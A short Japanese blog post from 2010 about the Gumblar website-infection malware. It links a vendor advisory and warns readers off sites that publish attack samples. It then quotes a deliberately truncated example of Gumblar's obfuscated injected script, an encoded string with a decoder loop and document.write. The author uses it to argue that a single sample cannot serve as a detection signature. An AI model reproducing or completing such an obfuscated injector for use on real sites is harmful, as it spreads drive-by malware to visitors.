Gumblarの件、簡単な覚書(2)
2010-02-07 01:57 /
前回に引き続き、Gumblar について。一時的に被害の届け出が増えたものの、対策や警告が一斉に発表されているため、
まずは Gumblar のおさらいです。
新ウイルス Gumblar(ガンブラー)対策について(McAfee)
それから、訳知り顔の人が攻撃スクリプトのサンプルをブログに挙げて紹介していたりするわけですが、そういうサイトは信用しないようにしましょう。セキュリティソフトの警告が出ないように途中をばっさり割愛して出しますが、例えば、
<script>var source =”=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)
[...]
227-232-219-212-72-45-229-216-226-216-
:9-216-219-216-227-232-69-43-215-216-
211-211-212-221-45-73-71-58-216-213-225-
:8-21:-212-73**<=0tdsjqu?”; var result = “”;
for(var i=0;i<source.length;i++) result+
[...]
document.write(result); </script>
こんなものは亜種のコードの一例でしかなく、スキャンするための必要条件はこんなコード一つで設定できるものではありません。
